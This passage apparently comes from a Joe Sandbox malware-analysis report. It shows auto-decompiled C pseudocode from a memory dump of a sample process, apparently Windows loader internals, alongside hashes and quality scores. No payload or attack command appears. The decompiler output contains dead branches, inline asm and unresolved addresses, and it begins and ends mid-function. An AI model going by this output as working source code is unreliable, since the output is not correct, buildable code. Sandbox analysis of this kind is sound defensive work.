                    											 *_t137 = 0;
                    										}
                    										 *_t202 = 0;
                    										_t129 = 0xc0000017;
                    										goto L23;
                    									} else {
                    										_t242 = _a16;
                    										if(_t242 != 0) {
                    											_t254 = _t229;
                    											memcpy(_t242, _t254, 0xd << 2);
                    											_t267 = _t267 + 0xc;
                    											_t242 = _t254 + 0x1a;
                    										}
                    										_t205 = _a4;
                    										_t25 = _t229 + 0x48; // 0x48
                    										 *_t205 = _t25;
                    										_t140 = _a8;
                    										if(_t140 != 0) {
                    											__eflags =  *((char*)(_t267 + 0xa));
                    											if( *((char*)(_t267 + 0xa)) != 0) {
                    												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
                    											} else {
                    												 *_t140 = 0;
                    											}
                    										}
                    										_t256 = _a12;
                    										if(_t256 != 0) {
                    											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
                    										}
                    										_t257 =  *_t205;
                    										_v48 = 0;
                    										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
                    										_v56 = 0;
                    										_v52 = 0;
                    										_t144 =  *( *[fs:0x30] + 0x50);
                    										if(_t144 != 0) {
                    											__eflags =  *_t144;
                    											if( *_t144 == 0) {
                    												goto L20;
                    											}
                    											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                    											goto L21;
                    										} else {
                    											L20:
                    											_t145 = 0x7ffe0384;
                    											L21:
                    											if( *_t145 != 0) {
                    												_t146 =  *[fs:0x30];
                    												__eflags =  *(_t146 + 0x240) & 0x00000004;
                    												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
                    													_t147 = E01687D50();
                    													__eflags = _t147;
                    													if(_t147 == 0) {
                    														_t148 = 0x7ffe0385;
                    													} else {
                    														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
                    													}
                    													__eflags =  *_t148 & 0x00000020;
                    													if(( *_t148 & 0x00000020) != 0) {
                    														_t149 = _v72;
                    														__eflags = _t149;
                    														if(__eflags == 0) {
                    															_t149 = 0x1645c80;
                    														}
                    														_push(_t149);
                    														_push( &_v48);
                    														 *((char*)(_t267 + 0xb)) = E0169F6E0(_t198, _t242, _t257, __eflags);
                    														_push(_t257);
                    														_push( &_v64);
                    														_t153 = E0169F6E0(_t198, _t242, _t257, __eflags);
                    														__eflags =  *((char*)(_t267 + 0xb));
                    														if( *((char*)(_t267 + 0xb)) != 0) {
                    															__eflags = _t153;
                    															if(_t153 != 0) {
                    																__eflags = 0;
                    																E016E7016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
                    																L01682400(_t267 + 0x20);
                    															}
                    															L01682400( &_v64);
                    														}
                    													}
                    												}
                    											}
                    											_t129 = 0;
                    											L23:
                    											return _t129;
                    										}
                    									}
                    								}
                    							}
                    							L8:
                    							_t275 = _t240;
                    							if(_t275 != 0) {
                    								_v73 = 0;
                    								_t253 = 0;
                    								__eflags = 0;
                    								L29:
                    								_push(0);
                    								_t241 = E01692397(_t240);
                    								__eflags = _t241;
                    								if(_t241 == 0) {
                    									_t229 = 0;
                    									L14:
                    									_t135 = 0;
                    									goto L15;
                    								}
                    								__eflags =  *((char*)(_t267 + 0xb));
                    								 *(_t241 + 0x34) = 1;
                    								if( *((char*)(_t267 + 0xb)) != 0) {
                    									E01682280(_t134, 0x1758608);
                    									__eflags =  *0x1756e48 - _t253; // 0x0
                    									if(__eflags != 0) {
                    										L48:
                    										_t253 = 0;
                    										__eflags = 0;
                    										L49:
                    										E0167FFB0(_t198, _t241, 0x1758608);
                    										__eflags = _t253;
                    										if(_t253 != 0) {
                    											L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
                    										}
                    										goto L31;
                    									}
                    									 *0x1756e48 = _t241;
                    									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
                    									__eflags = _t253;
                    									if(_t253 != 0) {
                    										_t57 = _t253 + 0x34;
                    										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
                    										__eflags =  *_t57;
                    										if( *_t57 == 0) {
                    											goto L49;
                    										}
                    									}
                    									goto L48;
                    								}
                    								L31:
                    								_t229 = _t241;
                    								goto L14;
                    							}
                    							_v73 = 1;
                    							_v64 = _t240;
                    							asm("lock bts dword [esi], 0x0");
                    							if(_t275 < 0) {
                    								_t231 =  *0x1758608; // 0x0
                    								while(1) {
                    									_v60 = _t231;
                    									__eflags = _t231 & 0x00000001;
                    									if((_t231 & 0x00000001) != 0) {
                    										goto L76;
                    									}
                    									_t73 = _t231 + 1; // 0x1
                    									_t210 = _t73;
                    									asm("lock cmpxchg [edi], ecx");
                    									__eflags = _t231 - _t231;
                    									if(_t231 != _t231) {
                    										L92:
                    										_t133 = E01696B90(_t210,  &_v64);
                    										_t262 =  *0x1758608; // 0x0
                    										L93:
                    										_t231 = _t262;
                    										continue;
                    									}
                    									_t240 = _v56;
                    									goto L10;
                    									L76:
                    									_t169 = E0169E180(_t133);
                    									__eflags = _t169;
                    									if(_t169 != 0) {
                    										_push(0xc000004b);
                    										_push(0xffffffff);
                    										E016A97C0();
                    										_t231 = _v68;
                    									}
                    									_v72 = 0;
                    									_v24 =  *( *[fs:0x18] + 0x24);
                    									_v16 = 3;
                    									_v28 = 0;
                    									__eflags = _t231 & 0x00000002;
                    									if((_t231 & 0x00000002) == 0) {
                    										_v32 =  &_v36;
                    										_t174 = _t231 >> 4;
                    										__eflags = 1 - _t174;
                    										_v20 = _t174;
                    										asm("sbb ecx, ecx");
                    										_t210 = 3 |  &_v36;
                    										__eflags = _t174;
                    										if(_t174 == 0) {
                    											_v20 = 0xfffffffe;
                    										}
                    									} else {
                    										_v32 = 0;
                    										_v20 = 0xffffffff;
                    										_v36 = _t231 & 0xfffffff0;
                    										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
                    										_v72 =  !(_t231 >> 2) & 0xffffff01;
                    									}
                    									asm("lock cmpxchg [edi], esi");
                    									_t262 = _t231;
                    									__eflags = _t262 - _t231;
                    									if(_t262 != _t231) {
                    										goto L92;
                    									} else {
                    										__eflags = _v72;
                    										if(_v72 != 0) {
                    											E016A006A(0x1758608, _t210);
                    										}
                    										__eflags =  *0x7ffe036a - 1;
                    										if(__eflags <= 0) {
                    											L89:
                    											_t133 =  &_v16;
                    											asm("lock btr dword [eax], 0x1");
                    											if(__eflags >= 0) {
                    												goto L93;
                    											} else {
                    												goto L90;
                    											}
                    											do {
                    												L90:
                    												_push(0);
                    												_push(0x1758608);
                    												E016AB180();
                    												_t133 = _v24;
                    												__eflags = _t133 & 0x00000004;
                    											} while ((_t133 & 0x00000004) == 0);
                    											goto L93;
                    										} else {
                    											_t218 =  *0x1756904; // 0x400
                    											__eflags = _t218;
                    											if(__eflags == 0) {
                    												goto L89;
                    											} else {
                    												goto L87;
                    											}
                    											while(1) {
                    												L87:
                    												__eflags = _v16 & 0x00000002;
                    												if(__eflags == 0) {
                    													goto L89;
                    												}
                    												asm("pause");
                    												_t218 = _t218 - 1;
                    												__eflags = _t218;
                    												if(__eflags != 0) {
                    													continue;
                    												}
                    												goto L89;
                    											}
                    											goto L89;
                    										}
                    									}
                    								}
                    							}
                    							L10:
                    							_t229 =  *0x1756e48; // 0x0
                    							_v72 = _t229;
                    							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
                    								E0167FFB0(_t198, _t240, 0x1758608);
                    								_t253 = _v76;
                    								goto L29;
                    							} else {
                    								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
                    								asm("lock cmpxchg [esi], ecx");
                    								_t215 = 1;
                    								if(1 != 1) {
                    									while(1) {
                    										_t246 = _t215 & 0x00000006;
                    										_t180 = _t215;
                    										__eflags = _t246 - 2;
                    										_v56 = _t246;
                    										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
                    										asm("lock cmpxchg [edi], esi");
                    										_t248 = _v56;
                    										__eflags = _t180 - _t215;
                    										if(_t180 == _t215) {
                    											break;
                    										}
                    										_t215 = _t180;
                    									}
                    									__eflags = _t248 - 2;
                    									if(_t248 == 2) {
                    										__eflags = 0;
                    										E016A00C2(0x1758608, 0, _t235);
                    									}
                    									_t229 = _v72;
                    								}
                    								goto L14;
                    							}
                    						}
                    					}
                    				}
                    				_t227 = 0;
                    				_v75 = 0;
                    				if(_t128 != 0) {
                    					goto L4;
                    				}
                    				goto L2;
                    			}












































































                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5cb07773ceb9673d9f4b950da77f129bb54e5a2beb6b176bdc3bf17d9c850881
                    • Instruction ID: 4b9f4d9b9b6904739ec9cd9e8aaebc953f3d315ddc0660836f3a07cd80c46063
                    • Opcode Fuzzy Hash: 5cb07773ceb9673d9f4b950da77f129bb54e5a2beb6b176bdc3bf17d9c850881
                    • Instruction Fuzzy Hash: 37F1E671A08341AFDB26CF2CCC5076B7BEAAF85324F08855DE9969B381D774D841CB92
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 87%
                    			E0167D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
                    				signed int _v8;
                    				intOrPtr _v20;
                    				signed int _v36;
                    				intOrPtr* _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				signed char _v52;
                    				signed int _v60;
                    				signed int _v64;
                    				signed int _v68;
                    				signed int _v72;
                    				signed int _v76;
                    				intOrPtr _v80;
                    				signed int _v84;
                    				intOrPtr _v100;
                    				intOrPtr _v104;
                    				signed int _v108;
                    				signed int _v112;
                    				signed int _v116;
                    				intOrPtr _v120;
                    				signed int _v132;
                    				char _v140;
                    				char _v144;
                    				char _v157;
                    				signed int _v164;
                    				signed int _v168;
                    				signed int _v169;
                    				intOrPtr _v176;
                    				signed int _v180;
                    				signed int _v184;
                    				intOrPtr _v188;
                    				signed int _v192;
                    				signed int _v200;
                    				signed int _v208;
                    				intOrPtr* _v212;
                    				char _v216;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				signed int _t204;
                    				void* _t208;
                    				signed int _t211;
                    				signed int _t216;
                    				intOrPtr _t217;
                    				intOrPtr* _t218;
                    				signed int _t226;
                    				signed int _t239;
                    				signed int* _t247;
                    				signed int _t249;
                    				void* _t252;
                    				signed int _t256;
                    				signed int _t269;
                    				signed int _t271;
                    				signed int _t277;
                    				signed int _t279;
                    				intOrPtr _t283;
                    				signed int _t287;
                    				signed int _t288;
                    				void* _t289;
                    				signed char _t290;
                    				signed int _t292;
                    				signed int* _t293;
                    				signed int _t306;
                    				signed int _t307;
                    				signed int _t308;
                    				signed int _t309;
                    				signed int _t310;
                    				intOrPtr _t311;
                    				intOrPtr _t312;
                    				signed int _t319;
                    				signed int _t320;
                    				signed int* _t324;
                    				signed int _t337;
                    				signed int _t338;
                    				signed int _t339;
                    				signed int* _t340;
                    				void* _t341;
                    				signed int _t344;
                    				signed int _t348;
                    				signed int _t349;
                    				signed int _t351;
                    				intOrPtr _t353;
                    				void* _t354;
                    				signed int _t356;
                    				signed int _t358;
                    				intOrPtr _t359;
                    				signed int _t363;
                    				signed short* _t365;
                    				void* _t367;
                    				intOrPtr _t369;
                    				void* _t370;
                    				signed int _t371;
                    				signed int _t372;
                    				void* _t374;
                    				signed int _t376;
                    				void* _t384;
                    				signed int _t387;
                    
                    				_v8 =  *0x175d360 ^ _t376;
                    				_t2 =  &_a20;
                    				 *_t2 = _a20 & 0x00000001;
                    				_t287 = _a4;
                    				_v200 = _a12;
                    				_t365 = _a8;
                    				_v212 = _a16;
                    				_v180 = _a24;
                    				_v168 = 0;
                    				_v157 = 0;
                    				if( *_t2 != 0) {
                    					__eflags = E01676600(0x17552d8);
                    					if(__eflags == 0) {
                    						goto L1;
                    					} else {
                    						_v188 = 6;
                    					}
                    				} else {
                    					L1:
                    					_v188 = 9;
                    				}
                    				if(_t365 == 0) {
                    					_v164 = 0;
                    					goto L5;
                    				} else {
                    					_t363 =  *_t365 & 0x0000ffff;
                    					_t341 = _t363 + 1;
                    					if((_t365[1] & 0x0000ffff) < _t341) {
                    						L109:
                    						__eflags = _t341 - 0x80;
                    						if(_t341 <= 0x80) {
                    							_t281 =  &_v140;
                    							_v164 =  &_v140;
                    							goto L114;
                    						} else {
                    							_t283 =  *0x1757b9c; // 0x0
                    							_t281 = L01684620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
                    							_v164 = _t281;
                    							__eflags = _t281;
                    							if(_t281 != 0) {
                    								_v157 = 1;
                    								L114:
                    								E016AF3E0(_t281, _t365[2], _t363);
                    								_t200 = _v164;
                    								 *((char*)(_v164 + _t363)) = 0;
                    								goto L5;
                    							} else {
                    								_t204 = 0xc000009a;
                    								goto L47;
                    							}
                    						}
                    					} else {
                    						_t200 = _t365[2];
                    						_v164 = _t200;
                    						if( *((char*)(_t200 + _t363)) != 0) {
                    							goto L109;
                    						} else {
                    							while(1) {
                    								L5:
                    								_t353 = 0;
                    								_t342 = 0x1000;
                    								_v176 = 0;
                    								if(_t287 == 0) {
                    									break;
                    								}
                    								_t384 = _t287 -  *0x1757b90; // 0x77460000
                    								if(_t384 == 0) {
                    									_t353 =  *0x1757b8c; // 0x1202aa0
                    									_v176 = _t353;
                    									_t320 = ( *(_t353 + 0x50))[8];
                    									_v184 = _t320;
                    								} else {
                    									E01682280(_t200, 0x17584d8);
                    									_t277 =  *0x17585f4; // 0x1202f90
                    									_t351 =  *0x17585f8 & 1;
                    									while(_t277 != 0) {
                    										_t337 =  *(_t277 - 0x50);
                    										if(_t337 > _t287) {
                    											_t338 = _t337 | 0xffffffff;
                    										} else {
                    											asm("sbb ecx, ecx");
                    											_t338 =  ~_t337;
                    										}
                    										_t387 = _t338;
                    										if(_t387 < 0) {
                    											_t339 =  *_t277;
                    											__eflags = _t351;
                    											if(_t351 != 0) {
                    												__eflags = _t339;
                    												if(_t339 == 0) {
                    													goto L16;
                    												} else {
                    													goto L118;
                    												}
                    												goto L151;
                    											} else {
                    												goto L16;
                    											}
                    											goto L17;
                    										} else {
                    											if(_t387 <= 0) {
                    												__eflags = _t277;
                    												if(_t277 != 0) {
                    													_t340 =  *(_t277 - 0x18);
                    													_t24 = _t277 - 0x68; // 0x1202f28
                    													_t353 = _t24;
                    													_v176 = _t353;
                    													__eflags = _t340[3] - 0xffffffff;
                    													if(_t340[3] != 0xffffffff) {
                    														_t279 =  *_t340;
                    														__eflags =  *(_t279 - 0x20) & 0x00000020;
                    														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                    															asm("lock inc dword [edi+0x9c]");
                    															_t340 =  *(_t353 + 0x50);
                    														}
                    													}
                    													_v184 = _t340[8];
                    												}
                    											} else {
                    												_t339 =  *(_t277 + 4);
                    												if(_t351 != 0) {
                    													__eflags = _t339;
                    													if(_t339 == 0) {
                    														goto L16;
                    													} else {
                    														L118:
                    														_t277 = _t277 ^ _t339;
                    														goto L17;
                    													}
                    													goto L151;
                    												} else {
                    													L16:
                    													_t277 = _t339;
                    												}
                    												goto L17;
                    											}
                    										}
                    										goto L25;
                    										L17:
                    									}
                    									L25:
                    									E0167FFB0(_t287, _t353, 0x17584d8);
                    									_t320 = _v184;
                    									_t342 = 0x1000;
                    								}
                    								if(_t353 == 0) {
                    									break;
                    								} else {
                    									_t366 = 0;
                    									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                    										_t288 = _v164;
                    										if(_t353 != 0) {
                    											_t342 = _t288;
                    											_t374 = E016BCC99(_t353, _t288, _v200, 1,  &_v168);
                    											if(_t374 >= 0) {
                    												if(_v184 == 7) {
                    													__eflags = _a20;
                    													if(__eflags == 0) {
                    														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                    														if(__eflags != 0) {
                    															_t271 = E01676600(0x17552d8);
                    															__eflags = _t271;
                    															if(__eflags == 0) {
                    																_t342 = 0;
                    																_v169 = _t271;
                    																_t374 = E01677926( *(_t353 + 0x50), 0,  &_v169);
                    															}
                    														}
                    													}
                    												}
                    												if(_t374 < 0) {
                    													_v168 = 0;
                    												} else {
                    													if( *0x175b239 != 0) {
                    														_t342 =  *(_t353 + 0x18);
                    														E016EE974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                    													}
                    													if( *0x1758472 != 0) {
                    														_v192 = 0;
                    														_t342 =  *0x7ffe0330;
                    														asm("ror edi, cl");
                    														 *0x175b1e0( &_v192, _t353, _v168, 0, _v180);
                    														 *( *0x175b218 ^  *0x7ffe0330)();
                    														_t269 = _v192;
                    														_t353 = _v176;
                    														__eflags = _t269;
                    														if(__eflags != 0) {
                    															_v168 = _t269;
                    														}
                    													}
                    												}
                    											}
                    											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                    												_t366 = 0xc000007a;
                    											}
                    											_t247 =  *(_t353 + 0x50);
                    											if(_t247[3] == 0xffffffff) {
                    												L40:
                    												if(_t366 == 0xc000007a) {
                    													__eflags = _t288;
                    													if(_t288 == 0) {
                    														goto L136;
                    													} else {
                    														_t366 = 0xc0000139;
                    													}
                    													goto L54;
                    												}
                    											} else {
                    												_t249 =  *_t247;
                    												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                    													goto L40;
                    												} else {
                    													_t250 = _t249 | 0xffffffff;
                    													asm("lock xadd [edi+0x9c], eax");
                    													if((_t249 | 0xffffffff) == 0) {
                    														E01682280(_t250, 0x17584d8);
                    														_t342 =  *(_t353 + 0x54);
                    														_t165 = _t353 + 0x54; // 0x54
                    														_t252 = _t165;
                    														__eflags =  *(_t342 + 4) - _t252;
                    														if( *(_t342 + 4) != _t252) {
                    															L135:
                    															asm("int 0x29");
                    															L136:
                    															_t288 = _v200;
                    															_t366 = 0xc0000138;
                    															L54:
                    															_t342 = _t288;
                    															L016A3898(0, _t288, _t366);
                    														} else {
                    															_t324 =  *(_t252 + 4);
                    															__eflags =  *_t324 - _t252;
                    															if( *_t324 != _t252) {
                    																goto L135;
                    															} else {
                    																 *_t324 = _t342;
                    																 *(_t342 + 4) = _t324;
                    																_t293 =  *(_t353 + 0x50);
                    																_v180 =  *_t293;
                    																E0167FFB0(_t293, _t353, 0x17584d8);
                    																__eflags =  *((short*)(_t353 + 0x3a));
                    																if( *((short*)(_t353 + 0x3a)) != 0) {
                    																	_t342 = 0;
                    																	__eflags = 0;
                    																	E016A37F5(_t353, 0);
                    																}
                    																E016A0413(_t353);
                    																_t256 =  *(_t353 + 0x48);
                    																__eflags = _t256;
                    																if(_t256 != 0) {
                    																	__eflags = _t256 - 0xffffffff;
                    																	if(_t256 != 0xffffffff) {
                    																		E01699B10(_t256);
                    																	}
                    																}
                    																__eflags =  *(_t353 + 0x28);
                    																if( *(_t353 + 0x28) != 0) {
                    																	_t174 = _t353 + 0x24; // 0x24
                    																	E016902D6(_t174);
                    																}
                    																L016877F0( *0x1757b98, 0, _t353);
                    																__eflags = _v180 - _t293;
                    																if(__eflags == 0) {
                    																	E0169C277(_t293, _t366);
                    																}
                    																_t288 = _v164;
                    																goto L40;
                    															}
                    														}
                    													} else {
                    														goto L40;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										L0167EC7F(_t353);
                    										L016919B8(_t287, 0, _t353, 0);
                    										_t200 = E0166F4E3(__eflags);
                    										continue;
                    									}
                    								}
                    								L41:
                    								if(_v157 != 0) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                    								}
                    								if(_t366 < 0 || ( *0x175b2f8 |  *0x175b2fc) == 0 || ( *0x175b2e4 & 0x00000001) != 0) {
                    									L46:
                    									 *_v212 = _v168;
                    									_t204 = _t366;
                    									L47:
                    									_pop(_t354);
                    									_pop(_t367);
                    									_pop(_t289);
                    									return E016AB640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                    								} else {
                    									_v200 = 0;
                    									if(( *0x175b2ec >> 0x00000008 & 0x00000003) == 3) {
                    										_t355 = _v168;
                    										_t342 =  &_v208;
                    										_t208 = E01716B68(_v168,  &_v208, _v168, __eflags);
                    										__eflags = _t208 - 1;
                    										if(_t208 == 1) {
                    											goto L46;
                    										} else {
                    											__eflags = _v208 & 0x00000010;
                    											if((_v208 & 0x00000010) == 0) {
                    												goto L46;
                    											} else {
                    												_t342 = 4;
                    												_t366 = E01716AEB(_t355, 4,  &_v216);
                    												__eflags = _t366;
                    												if(_t366 >= 0) {
                    													goto L46;
                    												} else {
                    													asm("int 0x29");
                    													_t356 = 0;
                    													_v44 = 0;
                    													_t290 = _v52;
                    													__eflags = 0;
                    													if(0 == 0) {
                    														L108:
                    														_t356 = 0;
                    														_v44 = 0;
                    														goto L63;
                    													} else {
                    														__eflags = 0;
                    														if(0 < 0) {
                    															goto L108;
                    														}
                    														L63:
                    														_v112 = _t356;
                    														__eflags = _t356;
                    														if(_t356 == 0) {
                    															L143:
                    															_v8 = 0xfffffffe;
                    															_t211 = 0xc0000089;
                    														} else {
                    															_v36 = 0;
                    															_v60 = 0;
                    															_v48 = 0;
                    															_v68 = 0;
                    															_v44 = _t290 & 0xfffffffc;
                    															E0167E9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                    															_t306 = _v68;
                    															__eflags = _t306;
                    															if(_t306 == 0) {
                    																_t216 = 0xc000007b;
                    																_v36 = 0xc000007b;
                    																_t307 = _v60;
                    															} else {
                    																__eflags = _t290 & 0x00000001;
                    																if(__eflags == 0) {
                    																	_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                    																	__eflags = _t349 - 0x10b;
                    																	if(_t349 != 0x10b) {
                    																		__eflags = _t349 - 0x20b;
                    																		if(_t349 == 0x20b) {
                    																			goto L102;
                    																		} else {
                    																			_t307 = 0;
                    																			_v48 = 0;
                    																			_t216 = 0xc000007b;
                    																			_v36 = 0xc000007b;
                    																			goto L71;
                    																		}
                    																	} else {
                    																		L102:
                    																		_t307 =  *(_t306 + 0x50);
                    																		goto L69;
                    																	}
                    																	goto L151;
                    																} else {
                    																	_t239 = L0167EAEA(_t290, _t290, _t356, _t366, __eflags);
                    																	_t307 = _t239;
                    																	_v60 = _t307;
                    																	_v48 = _t307;
                    																	__eflags = _t307;
                    																	if(_t307 != 0) {
                    																		L70:
                    																		_t216 = _v36;
                    																	} else {
                    																		_push(_t239);
                    																		_push(0x14);
                    																		_push( &_v144);
                    																		_push(3);
                    																		_push(_v44);
                    																		_push(0xffffffff);
                    																		_t319 = E016A9730();
                    																		_v36 = _t319;
                    																		__eflags = _t319;
                    																		if(_t319 < 0) {
                    																			_t216 = 0xc000001f;
                    																			_v36 = 0xc000001f;
                    																			_t307 = _v60;
                    																		} else {
                    																			_t307 = _v132;
                    																			L69:
                    																			_v48 = _t307;
                    																			goto L70;
                    																		}
                    																	}
                    																}
                    															}
                    															L71:
                    															_v72 = _t307;
                    															_v84 = _t216;
                    															__eflags = _t216 - 0xc000007b;
                    															if(_t216 == 0xc000007b) {
                    																L150:
                    																_v8 = 0xfffffffe;
                    																_t211 = 0xc000007b;
                    															} else {
                    																_t344 = _t290 & 0xfffffffc;
                    																_v76 = _t344;
                    																__eflags = _v40 - _t344;
                    																if(_v40 <= _t344) {
                    																	goto L150;
                    																} else {
                    																	__eflags = _t307;
                    																	if(_t307 == 0) {
                    																		L75:
                    																		_t217 = 0;
                    																		_v104 = 0;
                    																		__eflags = _t366;
                    																		if(_t366 != 0) {
                    																			__eflags = _t290 & 0x00000001;
                    																			if((_t290 & 0x00000001) != 0) {
                    																				_t217 = 1;
                    																				_v104 = 1;
                    																			}
                    																			_t290 = _v44;
                    																			_v52 = _t290;
                    																		}
                    																		__eflags = _t217 - 1;
                    																		if(_t217 != 1) {
                    																			_t369 = 0;
                    																			_t218 = _v40;
                    																			goto L91;
                    																		} else {
                    																			_v64 = 0;
                    																			E0167E9C0(1, _t290, 0, 0,  &_v64);
                    																			_t309 = _v64;
                    																			_v108 = _t309;
                    																			__eflags = _t309;
                    																			if(_t309 == 0) {
                    																				goto L143;
                    																			} else {
                    																				_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                    																				__eflags = _t226 - 0x10b;
                    																				if(_t226 != 0x10b) {
                    																					__eflags = _t226 - 0x20b;
                    																					if(_t226 != 0x20b) {
                    																						goto L143;
                    																					} else {
                    																						_t371 =  *(_t309 + 0x98);
                    																						goto L83;
                    																					}
                    																				} else {
                    																					_t371 =  *(_t309 + 0x88);
                    																					L83:
                    																					__eflags = _t371;
                    																					if(_t371 != 0) {
                    																						_v80 = _t371 - _t356 + _t290;
                    																						_t310 = _v64;
                    																						_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                    																						_t292 =  *(_t310 + 6) & 0x0000ffff;
                    																						_t311 = 0;
                    																						__eflags = 0;
                    																						while(1) {
                    																							_v120 = _t311;
                    																							_v116 = _t348;
                    																							__eflags = _t311 - _t292;
                    																							if(_t311 >= _t292) {
                    																								goto L143;
                    																							}
                    																							_t359 =  *((intOrPtr*)(_t348 + 0xc));
                    																							__eflags = _t371 - _t359;
                    																							if(_t371 < _t359) {
                    																								L98:
                    																								_t348 = _t348 + 0x28;
                    																								_t311 = _t311 + 1;
                    																								continue;
                    																							} else {
                    																								__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                    																								if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                    																									goto L98;
                    																								} else {
                    																									__eflags = _t348;
                    																									if(_t348 == 0) {
                    																										goto L143;
                    																									} else {
                    																										_t218 = _v40;
                    																										_t312 =  *_t218;
                    																										__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                    																										if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                    																											_v100 = _t359;
                    																											_t360 = _v108;
                    																											_t372 = L01678F44(_v108, _t312);
                    																											__eflags = _t372;
                    																											if(_t372 == 0) {
                    																												goto L143;
                    																											} else {
                    																												_t290 = _v52;
                    																												_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E016A3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                    																												_t307 = _v72;
                    																												_t344 = _v76;
                    																												_t218 = _v40;
                    																												goto L91;
                    																											}
                    																										} else {
                    																											_t290 = _v52;
                    																											_t307 = _v72;
                    																											_t344 = _v76;
                    																											_t369 = _v80;
                    																											L91:
                    																											_t358 = _a4;
                    																											__eflags = _t358;
                    																											if(_t358 == 0) {
                    																												L95:
                    																												_t308 = _a8;
                    																												__eflags = _t308;
                    																												if(_t308 != 0) {
                    																													 *_t308 =  *((intOrPtr*)(_v40 + 4));
                    																												}
                    																												_v8 = 0xfffffffe;
                    																												_t211 = _v84;
                    																											} else {
                    																												_t370 =  *_t218 - _t369 + _t290;
                    																												 *_t358 = _t370;
                    																												__eflags = _t370 - _t344;
                    																												if(_t370 <= _t344) {
                    																													L149:
                    																													 *_t358 = 0;
                    																													goto L150;
                    																												} else {
                    																													__eflags = _t307;
                    																													if(_t307 == 0) {
                    																														goto L95;
                    																													} else {
                    																														__eflags = _t370 - _t344 + _t307;
                    																														if(_t370 >= _t344 + _t307) {
                    																															goto L149;
                    																														} else {
                    																															goto L95;
                    																														}
                    																													}
                    																												}
                    																											}
                    																										}
                    																									}
                    																								}
                    																							}
                    																							goto L97;
                    																						}
                    																					}
                    																					goto L143;
                    																				}
                    																			}
                    																		}
                    																	} else {
                    																		__eflags = _v40 - _t307 + _t344;
                    																		if(_v40 >= _t307 + _t344) {
                    																			goto L150;
                    																		} else {
                    																			goto L75;
                    																		}
                    																	}
                    																}
                    															}
                    														}
                    														L97:
                    														 *[fs:0x0] = _v20;
                    														return _t211;
                    													}
                    												}
                    											}
                    										}
                    									} else {
                    										goto L46;
                    									}
                    								}
                    								goto L151;
                    							}
                    							_t288 = _v164;
                    							_t366 = 0xc0000135;
                    							goto L41;
                    						}
                    					}
                    				}
                    				L151:
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: eba27d8e2e52b400886fcb44593776b87c3489636728e0e651e6b2befa1cdf63
                    • Instruction ID: 26449c88bbb29b358d11c24fd3e6a087f95ea737cc18bef244999d5e4d877819
                    • Opcode Fuzzy Hash: eba27d8e2e52b400886fcb44593776b87c3489636728e0e651e6b2befa1cdf63
                    • Instruction Fuzzy Hash: 6CE1DE30A0136ACFEB25DF68CC90BB9BBB2BF45714F05459DD90997381D770A982CB51
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 92%
                    			E0167849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                    				void* _t136;
                    				signed int _t139;
                    				signed int _t141;
                    				signed int _t145;
                    				intOrPtr _t146;
                    				signed int _t149;
                    				signed int _t150;
                    				signed int _t161;
                    				signed int _t163;
                    				signed int _t165;
                    				signed int _t169;
                    				signed int _t171;
                    				signed int _t194;
                    				signed int _t200;
                    				void* _t201;
                    				signed int _t204;
                    				signed int _t206;
                    				signed int _t210;
                    				signed int _t214;
